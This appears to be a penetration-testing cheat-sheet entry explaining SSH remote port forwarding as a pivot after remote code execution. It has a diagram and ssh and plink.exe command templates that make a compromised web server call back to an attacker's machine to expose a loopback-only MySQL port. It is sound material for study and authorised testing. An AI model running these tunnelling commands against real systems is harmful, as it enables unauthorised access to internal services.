SSH remote port forwarding can be used to open a listener on the SSH server that forwards traffic to the SSH client. This is useful when a database server port is only accessible on the loopback interface (127.0.0.1), for which case the attack can gain access to the server port by having the web server machine connect back to the SSH server on the attacker machine.
Note: If access to the entire remote network is needed, see SSH dynamic port forwarding.
Example
Setup starts with “Web on 80” in Target Machine (solid), and practical usage starts with MySQL Client in Local Machine (dotted).
graph TD
subgraph Target Machine
r80[[Web on 80]] -->|RCE| sshclient[SSH Client]
r3306[[SQL on 3306]]
end
subgraph Local Machine
l22[[SSH on 22]] --->|creates| listener[[Listener]]
mysql[MySQL Client] -.->|connects to| listener
end
sshclient -->|portfwd setup| l22
listener -.-> |forward over SSH|r3306
How-to
This allows lhost to access rport which may be accessible on rhost’s loopback interface only.
ssh -N -R lhost:lport:127.0.0.1:rport luser@lhostOn Windows, use plink.exe (again, local = attacker machine):
cmd.exe /c echo y | plink.exe -ssh -l LUSER -pw PASSWORD -R LHOST:LPORT:127.0.0.1:RPORTA piped “y” input is needed because plink.exe will trigger the SSH host key prompt, which may not be accessible for an non-interactive shell.